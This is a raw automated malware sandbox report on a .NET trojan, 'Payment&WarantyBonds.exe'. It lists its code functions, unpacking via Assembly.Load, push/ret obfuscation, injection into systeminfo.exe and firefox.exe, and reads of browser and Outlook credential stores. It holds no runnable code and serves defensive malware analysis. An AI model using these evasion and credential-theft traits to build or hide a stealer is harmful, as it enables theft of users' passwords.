Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482A352 7_2_0482A352
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04810CB5 7_2_04810CB5
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04770C00 7_2_04770C00
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04760CF2 7_2_04760CF2
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0477AD00 7_2_0477AD00
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0476ADE0 7_2_0476ADE0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0480CD1F 7_2_0480CD1F
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04788DBF 7_2_04788DBF
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482CE93 7_2_0482CE93
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04770E59 7_2_04770E59
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482EEDB 7_2_0482EEDB
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482EE26 7_2_0482EE26
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04782E90 7_2_04782E90
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047E4F40 7_2_047E4F40
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04790F30 7_2_04790F30
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047B2F28 7_2_047B2F28
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04812F30 7_2_04812F30
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04762FC8 7_2_04762FC8
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047EEFA0 7_2_047EEFA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04772840 7_2_04772840
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0477A840 7_2_0477A840
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0479E8F0 7_2_0479E8F0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047568B8 7_2_047568B8
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04786962 7_2_04786962
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0483A9A6 7_2_0483A9A6
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047729A0 7_2_047729A0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0476EA80 7_2_0476EA80
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04826BD7 7_2_04826BD7
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482AB40 7_2_0482AB40
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04761460 7_2_04761460
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482F43F 7_2_0482F43F
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0480D5B0 7_2_0480D5B0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04827571 7_2_04827571
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_048216CC 7_2_048216CC
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482F7B0 7_2_0482F7B0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0481F0CC 7_2_0481F0CC
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482F0E0 7_2_0482F0E0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_048270E9 7_2_048270E9
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047770C0 7_2_047770C0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0475F172 7_2_0475F172
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047A516C 7_2_047A516C
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0477B1B0 7_2_0477B1B0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0483B16B 7_2_0483B16B
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_048112ED 7_2_048112ED
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0478D2F0 7_2_0478D2F0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0478B2C0 7_2_0478B2C0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047752A0 7_2_047752A0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0475D34C 7_2_0475D34C
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482132D 7_2_0482132D
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047B739A 7_2_047B739A
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047E9C32 7_2_047E9C32
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482FCF2 7_2_0482FCF2
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04773D40 7_2_04773D40
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0478FDC0 7_2_0478FDC0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04821D5A 7_2_04821D5A
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04827D73 7_2_04827D73
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04779EB0 7_2_04779EB0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482FFB1 7_2_0482FFB1
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482FF09 7_2_0482FF09
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04733FD2 7_2_04733FD2
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04733FD5 7_2_04733FD5
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04771F92 7_2_04771F92
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047DD800 7_2_047DD800
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047738E0 7_2_047738E0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04779950 7_2_04779950
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0478B950 7_2_0478B950
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04805910 7_2_04805910
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047E3A6C 7_2_047E3A6C
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04811AA3 7_2_04811AA3
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0480DAAC 7_2_0480DAAC
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0481DAC6 7_2_0481DAC6
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_04827A46 7_2_04827A46
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482FA49 7_2_0482FA49
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047B5AA0 7_2_047B5AA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047ADBF9 7_2_047ADBF9
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047E5BF0 7_2_047E5BF0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0482FB76 7_2_0482FB76
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0478FB80 7_2_0478FB80
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00561CA0 7_2_00561CA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0055CBF7 7_2_0055CBF7
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0055CC00 7_2_0055CC00
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0055CE20 7_2_0055CE20
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0055AEA0 7_2_0055AEA0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00565300 7_2_00565300
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_005634F9 7_2_005634F9
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_00563540 7_2_00563540
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0056353B 7_2_0056353B
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0057B8D0 7_2_0057B8D0
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0465E73C 7_2_0465E73C
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0465E284 7_2_0465E284
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0465E3A3 7_2_0465E3A3
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0465D808 7_2_0465D808
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: String function: 0149EA12 appears 86 times
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: String function: 0141B970 appears 250 times
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: String function: 01477E54 appears 93 times
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: String function: 014AF290 appears 103 times
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: String function: 01465130 appears 36 times
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: String function: 047A5130 appears 58 times
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: String function: 047EF290 appears 103 times
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: String function: 047DEA12 appears 86 times
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: String function: 0475B970 appears 262 times
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: String function: 047B7E54 appears 99 times
Sample file is different than original file name gathered from version info
Source: Payment&WarantyBonds.exe, 00000000.00000002.1747632834.0000000004405000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000000.00000002.1752667969.000000000B480000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: OriginalFilenameTyrone.dll8 vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000000.00000000.1682657337.00000000006FC000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000000.00000002.1745782038.0000000000C1E000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameclr.dllT vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EE5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesysinfo.exej% vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.000000000151D000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: OriginalFilenamentdll.dllj% vs Payment&WarantyBonds.exe
Source: Payment&WarantyBonds.exe Binary or memory string: OriginalFilenamejmUl.exe8 vs Payment&WarantyBonds.exe
Uses 32bit PE files
Source: Payment&WarantyBonds.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: Payment&WarantyBonds.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, cILh9bHvx4dPN3VnUI.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.SetAccessControl
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs Security API names: _0020.AddAccessRule
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@7/2@18/14
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Payment&WarantyBonds.exe.log Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Mutant created: NULL
Source: C:\Windows\SysWOW64\systeminfo.exe File created: C:\Users\user\AppData\Local\Temp\4648H9mUM Jump to behavior
Source: Payment&WarantyBonds.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: Payment&WarantyBonds.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Program Files\Mozilla Firefox\firefox.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: systeminfo.exe, 00000007.00000003.2251386954.0000000000976000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4147496833.0000000000976000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Payment&WarantyBonds.exe ReversingLabs: Detection: 23%
Source: unknown Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe"
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Process created: C:\Users\user\Desktop\Payment&WarantyBonds.exe "C:\Users\user\Desktop\Payment&WarantyBonds.exe" Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe" Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: ieframe.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: mlang.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: winsqlite3.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: vaultcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: dnsapi.dll Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: fwpuclnt.dll Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Section loaded: rasadhlp.dll Jump to behavior
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32 Jump to behavior
Source: C:\Program Files (x86)\kKRezLukEtomJldoeFBChjEQtNlvuMkWmhpzdXhqjzhwuAoylANH\oDnyHukDVUZk.exe Process created: C:\Windows\SysWOW64\systeminfo.exe "C:\Windows\SysWOW64\systeminfo.exe"
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\SysWOW64\systeminfo.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\ Jump to behavior
Source: Payment&WarantyBonds.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: Payment&WarantyBonds.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: sysinfo.pdb source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sysinfo.pdbGCTL source: Payment&WarantyBonds.exe, 00000002.00000002.2062877202.0000000000EB8000.00000004.00000020.00020000.00000000.sdmp, oDnyHukDVUZk.exe, 00000006.00000002.4147696582.0000000000818000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: oDnyHukDVUZk.exe, 00000006.00000002.4147995475.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp, oDnyHukDVUZk.exe, 00000008.00000002.4147962601.0000000000A0E000.00000002.00000001.01000000.0000000C.sdmp
Source: Binary string: wntdll.pdbUGP source: Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: Payment&WarantyBonds.exe, Payment&WarantyBonds.exe, 00000002.00000002.2063188272.00000000013F0000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, systeminfo.exe, 00000007.00000002.4148681632.00000000048CE000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2068016060.0000000004586000.00000004.00000020.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000002.4148681632.0000000004730000.00000040.00001000.00020000.00000000.sdmp, systeminfo.exe, 00000007.00000003.2065768682.00000000043D0000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation
barindex
.NET source code contains potential unpacker
Source: 0.2.Payment&WarantyBonds.exe.b480000.4.raw.unpack, pN57RL3xyXkW5ANnHQ.cs .Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment&WarantyBonds.exe.4514488.0.raw.unpack, pN57RL3xyXkW5ANnHQ.cs .Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment&WarantyBonds.exe.39e0b90.2.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment&WarantyBonds.exe.72d0000.3.raw.unpack, Uo.cs .Net Code: _202A_202E_206E_206A_202B_206A_200E_200D_206F_200D_200C_200B_206E_202C_202B_200E_206A_202D_202A_202C_202E_206B_202C_202E_202D_206F_206C_200E_202D_206B_202D_206D_202A_200C_200C_200B_200C_202B_200D_202E_202E System.Reflection.Assembly.Load(byte[])
Source: 0.2.Payment&WarantyBonds.exe.448ca68.1.raw.unpack, pN57RL3xyXkW5ANnHQ.cs .Net Code: lF1lHEnjq2 System.Reflection.Assembly.Load(byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 0_2_0B1504E8 push esp; ret 0_2_0B1504E9
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0040185B pushfd ; retf 2_2_0040187E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00426833 push edi; ret 2_2_0042683E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004148C0 push esp; retf 2_2_004148C1
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004018BC pushad ; ret 2_2_004018D2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004031B0 push eax; ret 2_2_004031B2
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004139BA pushfd ; ret 2_2_004139BB
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0041AA77 push edx; iretd 2_2_0041AA86
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00418304 push eax; ret 2_2_00418305
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00417BD1 push esi; ret 2_2_00417BDA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0040D3BF push edx; ret 2_2_0040D3DA
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00422562 push ss; retn 0000h 2_2_0042256A
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00417E58 push ss; retf 2_2_00417E8D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0041A6CB push edi; retf 2_2_0041A6DC
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_00401F0B pushfd ; retf 2_2_00401F0C
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0041771B push esi; ret 2_2_0041771D
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_0041473C push edi; retf 2_2_0041473E
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_004117B1 push ss; iretd 2_2_004117C5
Source: C:\Users\user\Desktop\Payment&WarantyBonds.exe Code function: 2_2_014209AD push ecx; mov dword ptr [esp], ecx 2_2_014209B6
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_047327FA pushad ; ret 7_2_047327F9
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0473225F pushad ; ret 7_2_047327F9
Source: C:\Windows\SysWOW64\systeminfo.exe Code function: 7_2_0473283D push eax; iretd 7_2_04732858
